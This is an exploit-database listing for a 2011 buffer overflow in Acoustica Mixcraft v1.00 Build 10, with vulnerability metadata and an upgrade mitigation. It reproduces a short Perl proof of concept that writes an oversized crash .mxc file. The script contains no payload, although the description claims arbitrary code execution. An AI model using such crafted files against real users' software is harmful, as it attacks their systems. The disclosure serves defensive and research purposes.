header-logo
Suggest Exploit
vendor:
Mixcraft
by:
NassRawI
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Mixcraft
Affected Version From: v1.00 Build 10
Affected Version To: v1.00 Build 10
Patch Exists: Yes
Related CWE: N/A
CPE: a:acoustica:mixcraft
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2011

Acoustica Mixcraft v1.00 Build 10 Buffer Overflow

A buffer overflow vulnerability exists in Acoustica Mixcraft v1.00 Build 10. An attacker can exploit this vulnerability by creating a specially crafted .mxc file and sending it to the victim. When the victim opens the file, the attacker can execute arbitrary code on the victim's system.

Mitigation:

Upgrade to the latest version of Acoustica Mixcraft.
Source

Exploit-DB raw data:

#!/usr/bin/perl

print q(
########################################################
# home : http://www.D99Y.com  
# Date : 9/8/2011  
# Author : NassRawI  
# Software Link : http://www.acoustica.com/mixcraft/
# Version : v1.00 Build 10  
# Tested on : Windows XP SP2
########################################################
);

my $file= "crash.mxc";
my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
open(d99y,">$file");
print d99y $junk ;
close(d99y);
print "\n [ # ] Vulnerable File Created !\n"